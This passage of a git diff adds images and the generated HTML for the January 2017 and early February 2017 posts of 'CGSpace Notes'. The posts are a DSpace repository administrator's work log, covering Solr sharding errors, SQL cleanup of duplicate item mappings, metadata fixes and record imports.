new file mode 100644
index 000000000..d0dcbaad0
Binary files /dev/null and b/docs/2016/11/listings-and-reports-55.png differ
diff --git a/docs/2016/11/listings-and-reports.png b/docs/2016/11/listings-and-reports.png
new file mode 100644
index 000000000..33709af07
Binary files /dev/null and b/docs/2016/11/listings-and-reports.png differ
diff --git a/docs/2016/12/batch-edit1.png b/docs/2016/12/batch-edit1.png
new file mode 100644
index 000000000..dd97e271b
Binary files /dev/null and b/docs/2016/12/batch-edit1.png differ
diff --git a/docs/2016/12/batch-edit2.png b/docs/2016/12/batch-edit2.png
new file mode 100644
index 000000000..b6a49aad3
Binary files /dev/null and b/docs/2016/12/batch-edit2.png differ
diff --git a/docs/2016/12/postgres_bgwriter-week-2016-12-13.png b/docs/2016/12/postgres_bgwriter-week-2016-12-13.png
new file mode 100644
index 000000000..f3e8357af
Binary files /dev/null and b/docs/2016/12/postgres_bgwriter-week-2016-12-13.png differ
diff --git a/docs/2016/12/postgres_bgwriter-week.png b/docs/2016/12/postgres_bgwriter-week.png
new file mode 100644
index 000000000..2abcbcaf0
Binary files /dev/null and b/docs/2016/12/postgres_bgwriter-week.png differ
diff --git a/docs/2016/12/postgres_connections_ALL-week-2016-12-13.png b/docs/2016/12/postgres_connections_ALL-week-2016-12-13.png
new file mode 100644
index 000000000..0373d7002
Binary files /dev/null and b/docs/2016/12/postgres_connections_ALL-week-2016-12-13.png differ
diff --git a/docs/2016/12/postgres_connections_ALL-week.png b/docs/2016/12/postgres_connections_ALL-week.png
new file mode 100644
index 000000000..fc9cd3276
Binary files /dev/null and b/docs/2016/12/postgres_connections_ALL-week.png differ
diff --git a/docs/2016/12/postgres_size_ALL-week.png b/docs/2016/12/postgres_size_ALL-week.png
new file mode 100644
index 000000000..e2a6dabec
Binary files /dev/null and b/docs/2016/12/postgres_size_ALL-week.png differ
diff --git a/docs/2017-01/index.html b/docs/2017-01/index.html
new file mode 100644
index 000000000..bf42724a7
--- /dev/null
+++ b/docs/2017-01/index.html
@@ -0,0 +1,423 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="January, 2017" />
+<meta property="og:description" content="2017-01-02
+
+I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error
+I tested on DSpace Test as well and it doesn&rsquo;t work there either
+I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-01/" />
+<meta property="article:published_time" content="2017-01-02T10:43:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="January, 2017"/>
+<meta name="twitter:description" content="2017-01-02
+
+I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error
+I tested on DSpace Test as well and it doesn&rsquo;t work there either
+I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "January, 2017",
+  "url": "https://alanorth.github.io/cgspace-notes/2017-01/",
+  "wordCount": "1594",
+  "datePublished": "2017-01-02T10:43:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2017-01/">
+
+    <title>January, 2017 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-01/">January, 2017</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2017-01-02T10:43:00+03:00">Mon Jan 02, 2017</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-01-02">2017-01-02</h2>
+<ul>
+<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li>
+<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li>
+<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li>
+</ul>
+<h2 id="2017-01-04">2017-01-04</h2>
+<ul>
+<li>I tried to shard my local dev instance and it fails the same way:</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace stats-util -s
+Moving: 9318 into core statistics-2016
+Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.dspace.statistics.SolrLogger.shardSolrIndex(SourceFile:2291)
+        at org.dspace.statistics.util.StatisticsClient.main(StatisticsClient.java:106)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.apache.http.client.ClientProtocolException
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:867)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:106)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:57)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:448)
+        ... 10 more
+Caused by: org.apache.http.client.NonRepeatableRequestException: Cannot retry request with a non-repeatable request entity.  The cause lists the reason the original request failed.
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:659)
+        at org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:487)
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:863)
+        ... 14 more
+Caused by: java.net.SocketException: Broken pipe (Write failed)
+        at java.net.SocketOutputStream.socketWrite0(Native Method)
+        at java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:109)
+        at java.net.SocketOutputStream.write(SocketOutputStream.java:153)
+        at org.apache.http.impl.io.AbstractSessionOutputBuffer.write(AbstractSessionOutputBuffer.java:181)
+        at org.apache.http.impl.io.ChunkedOutputStream.flushCacheWithAppend(ChunkedOutputStream.java:124)
+        at org.apache.http.impl.io.ChunkedOutputStream.write(ChunkedOutputStream.java:181)
+        at org.apache.http.entity.InputStreamEntity.writeTo(InputStreamEntity.java:132)
+        at org.apache.http.entity.HttpEntityWrapper.writeTo(HttpEntityWrapper.java:89)
+        at org.apache.http.impl.client.EntityEnclosingRequestWrapper$EntityWrapper.writeTo(EntityEnclosingRequestWrapper.java:108)
+        at org.apache.http.impl.entity.EntitySerializer.serialize(EntitySerializer.java:117)
+        at org.apache.http.impl.AbstractHttpClientConnection.sendRequestEntity(AbstractHttpClientConnection.java:265)
+        at org.apache.http.impl.conn.ManagedClientConnectionImpl.sendRequestEntity(ManagedClientConnectionImpl.java:203)
+        at org.apache.http.protocol.HttpRequestExecutor.doSendRequest(HttpRequestExecutor.java:236)
+        at org.apache.http.protocol.HttpRequestExecutor.execute(HttpRequestExecutor.java:121)
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:685)
+        ... 16 more
+</code></pre><ul>
+<li>And the DSpace log shows:</li>
+</ul>
+<pre tabindex="0"><code>2017-01-04 22:39:05,412 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
+2017-01-04 22:39:05,412 INFO  org.dspace.statistics.SolrLogger @ Moving: 9318 records into core statistics-2016
+2017-01-04 22:39:07,310 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (java.net.SocketException) caught when processing request to {}-&gt;http://localhost:8081: Broken pipe (Write failed)
+2017-01-04 22:39:07,310 INFO  org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}-&gt;http://localhost:8081
+</code></pre><ul>
+<li>Despite failing instantly, a <code>statistics-2016</code> directory was created, but it only has a data dir (no conf)</li>
+<li>The Tomcat access logs show more:</li>
+</ul>
+<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
+127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 423
+127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 77
+127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
+127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 4359517
+127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16248
+127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 409 156
+127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&#34; 200 41
+127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update HTTP/1.1&#34; 200 40
+</code></pre><ul>
+<li>Very interesting&hellip; it creates the core and then fails somehow</li>
+</ul>
+<h2 id="2017-01-08">2017-01-08</h2>
+<ul>
+<li>Put Sisay&rsquo;s <code>item-view.xsl</code> code to show mapped collections on CGSpace (<a href="https://github.com/ilri/DSpace/pull/295">#295</a>)</li>
+</ul>
+<h2 id="2017-01-09">2017-01-09</h2>
+<ul>
+<li>A user wrote to tell me that the new display of an item&rsquo;s mappings had a crazy bug for at least one item: <a href="https://cgspace.cgiar.org/handle/10568/78596">https://cgspace.cgiar.org/handle/10568/78596</a></li>
+<li>She said she only mapped it once, but it appears to be mapped 184 times</li>
+</ul>
+<p><img src="/cgspace-notes/2017/01/mapping-crazy-duplicate.png" alt="Crazy item mapping"></p>
+<h2 id="2017-01-10">2017-01-10</h2>
+<ul>
+<li>I tried to clean up the duplicate mappings by exporting the item&rsquo;s metadata to CSV, editing, and re-importing, but DSpace said &ldquo;no changes were detected&rdquo;</li>
+<li>I&rsquo;ve asked on the dspace-tech mailing list to see if anyone can help</li>
+<li>I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help</li>
+<li>For example, this shows 186 mappings for the item, the first three of which are real:</li>
+</ul>
+<pre tabindex="0"><code>dspace=#  select * from collection2item where item_id = &#39;80596&#39;;
+</code></pre><ul>
+<li>Then I deleted the others:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
+</code></pre><ul>
+<li>And in the item view it now shows the correct mappings</li>
+<li>I will have to ask the DSpace people if this is a valid approach</li>
+<li>Finish looking at the Journal Title corrections of the top 500 Journal Titles so we can make a controlled vocabulary from it</li>
+</ul>
+<h2 id="2017-01-11">2017-01-11</h2>
+<ul>
+<li>Maria found another item with duplicate mappings: <a href="https://cgspace.cgiar.org/handle/10568/78658">https://cgspace.cgiar.org/handle/10568/78658</a></li>
+<li>Error in <code>fix-metadata-values.py</code> when it tries to print the value for Entwicklung &amp; Ländlicher Raum:</li>
+</ul>
+<pre tabindex="0"><code>Traceback (most recent call last):
+  File &#34;./fix-metadata-values.py&#34;, line 80, in &lt;module&gt;
+    print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0]))
+UnicodeEncodeError: &#39;ascii&#39; codec can&#39;t encode character u&#39;\xe4&#39; in position 15: ordinal not in range(128)
+</code></pre><ul>
+<li>Seems we need to encode as UTF-8 before printing to screen, ie:</li>
+</ul>
+<pre tabindex="0"><code>print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0].encode(&#39;utf-8&#39;)))
+</code></pre><ul>
+<li>See: <a href="http://stackoverflow.com/a/36427358/487333">http://stackoverflow.com/a/36427358/487333</a></li>
+<li>I&rsquo;m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database&hellip; I&rsquo;ve never had this issue before</li>
+<li>Now back to cleaning up some journal titles so we can make the controlled vocabulary:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Now get the top 500 journal titles:</li>
+</ul>
+<pre tabindex="0"><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
+</code></pre><ul>
+<li>The values are a bit dirty and outdated, since the file I had given to Abenet and Peter was from November</li>
+<li>I will have to go through these and fix some more before making the controlled vocabulary</li>
+<li>Added 30 more corrections or so, now there are 49 total and I&rsquo;ll have to get the top 500 after applying them</li>
+</ul>
+<h2 id="2017-01-13">2017-01-13</h2>
+<ul>
+<li>Add <code>FOOD SYSTEMS</code> to CIAT subjects, waiting to merge: <a href="https://github.com/ilri/DSpace/pull/296">https://github.com/ilri/DSpace/pull/296</a></li>
+</ul>
+<h2 id="2017-01-16">2017-01-16</h2>
+<ul>
+<li>Fix the two items Maria found with duplicate mappings with this script:</li>
+</ul>
+<pre tabindex="0"><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
+delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
+/* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
+delete from collection2item where id = &#39;91082&#39;;
+</code></pre><h2 id="2017-01-17">2017-01-17</h2>
+<ul>
+<li>Helping clean up some file names in the 232 CIAT records that Sisay worked on last week</li>
+<li>There are about 30 files with <code>%20</code> (space) and Spanish accents in the file name</li>
+<li>At first I thought we should fix these, but actually it is <a href="https://www.w3.org/TR/html4/appendix/notes.html#h-B.2.1">prescribed by the W3 working group to convert these to UTF8 and URL encode them</a>!</li>
+<li>And the file names don&rsquo;t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore</li>
+<li>Seems like the only ones I should replace are the <code>'</code> apostrophe characters, as <code>%27</code>:</li>
+</ul>
+<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;%27&#39;)
+</code></pre><ul>
+<li>Add the item&rsquo;s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:</li>
+</ul>
+<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
+</code></pre><ul>
+<li>Test importing of the new CIAT records (actually there are 232, not 234):</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
+</code></pre><ul>
+<li>Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB</li>
+<li>These are scanned from paper and likely have no compression, so we should try to test if these compression techniques help without comprimising the quality too much:</li>
+</ul>
+<pre tabindex="0"><code>$ convert -compress Zip -density 150x150 input.pdf output.pdf
+$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf
+</code></pre><ul>
+<li>Somewhere on the Internet suggested using a DPI of 144</li>
+</ul>
+<h2 id="2017-01-19">2017-01-19</h2>
+<ul>
+<li>In testing a random sample of CIAT&rsquo;s PDFs for compressability, it looks like all of these methods generally increase the file size so we will just import them as they are</li>
+<li>Import 232 CIAT records into CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
+</code></pre><h2 id="2017-01-22">2017-01-22</h2>
+<ul>
+<li>Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace return characters from Excel&rsquo;s CSV exporter)</li>
+<li>There were also some issues with an invalid dc.date.issued field, and I trimmed leading / trailing whitespace and cleaned up some URLs with unneeded parameters like ?show=full</li>
+</ul>
+<h2 id="2017-01-23">2017-01-23</h2>
+<ul>
+<li>I merged Atmire&rsquo;s pull request into the development branch so they can deploy it on DSpace Test</li>
+<li>Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):</li>
+</ul>
+<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&#34;$community&#34; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&#34;$community&#34;; done
+</code></pre><ul>
+<li>Move some collections with <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move-collections.sh</code></a> using the following config:</li>
+</ul>
+<pre tabindex="0"><code>10568/42161 10568/171 10568/79341
+10568/41914 10568/171 10568/79340
+</code></pre><h2 id="2017-01-24">2017-01-24</h2>
+<ul>
+<li>Run all updates on DSpace Test and reboot the server</li>
+<li>Run fixes for Journal titles on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;password&#39;
+</code></pre><ul>
+<li>Create a new list of the top 500 journal titles from the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
+</code></pre><ul>
+<li>Then sort them in OpenRefine and create a controlled vocabulary by manually adding the XML markup, pull request (<a href="https://github.com/ilri/DSpace/pull/298">#298</a>)</li>
+<li>This would be the last issue remaining to close the meta issue about switching to controlled vocabularies (<a href="https://github.com/ilri/DSpace/pull/69">#69</a>)</li>
+</ul>
+<h2 id="2017-01-25">2017-01-25</h2>
+<ul>
+<li>Atmire says the <code>com.atmire.statistics.util.UpdateSolrStorageReports</code> and <code>com.atmire.utils.ReportSender</code> are no longer necessary because they are using a Spring scheduler for these tasks now</li>
+<li>Pull request to remove them from the Ansible templates: <a href="https://github.com/ilri/rmg-ansible-public/pull/80">https://github.com/ilri/rmg-ansible-public/pull/80</a></li>
+<li>Still testing the Atmire modules on DSpace Test, and it looks like a few issues we had reported are now fixed:
+<ul>
+<li>XLS Export from Content statistics</li>
+<li>Most popular items</li>
+<li>Show statistics on collection pages</li>
+</ul>
+</li>
+<li>But now we have a new issue with the &ldquo;Types&rdquo; in Content statistics not being respected—we only get the defaults, despite having custom settings in <code>dspace/config/modules/atmire-cua.cfg</code></li>
+</ul>
+<h2 id="2017-01-27">2017-01-27</h2>
+<ul>
+<li>Magdalena pointed out that somehow the Anonymous group had been added to the Administrators group on CGSpace (!)</li>
+<li>Discuss plans to update CCAFS metadata and communities for their new flagships and phase II project identifiers</li>
+<li>The flagships are in <code>cg.subject.ccafs</code>, and we need to probably make a new field for the phase II project identifiers</li>
+</ul>
+<h2 id="2017-01-28">2017-01-28</h2>
+<ul>
+<li>Merge controlled vocabulary for journal titles (<code>dc.source</code>) into CGSpace (<a href="https://github.com/ilri/DSpace/pull/298">#298</a>)</li>
+<li>Merge new CIAT subject into CGSpace (<a href="https://github.com/ilri/DSpace/pull/296">#296</a>)</li>
+</ul>
+<h2 id="2017-01-29">2017-01-29</h2>
+<ul>
+<li>Run all system updates on DSpace Test, redeploy DSpace code, and reboot the server</li>
+<li>Run all system updates on CGSpace, redeploy DSpace code, and reboot the server</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017-02/index.html b/docs/2017-02/index.html
new file mode 100644
index 000000000..994aafadd
--- /dev/null
+++ b/docs/2017-02/index.html
@@ -0,0 +1,477 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2017" />
+<meta property="og:description" content="2017-02-07
+
+An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
+
+dspace=# select * from collection2item where item_id = &#39;80278&#39;;
+  id   | collection_id | item_id
+-------&#43;---------------&#43;---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+
+Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
+Looks like we&rsquo;ll be using cg.identifier.ccafsprojectpii as the field name
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-02/" />
+<meta property="article:published_time" content="2017-02-07T07:04:52-08:00" />
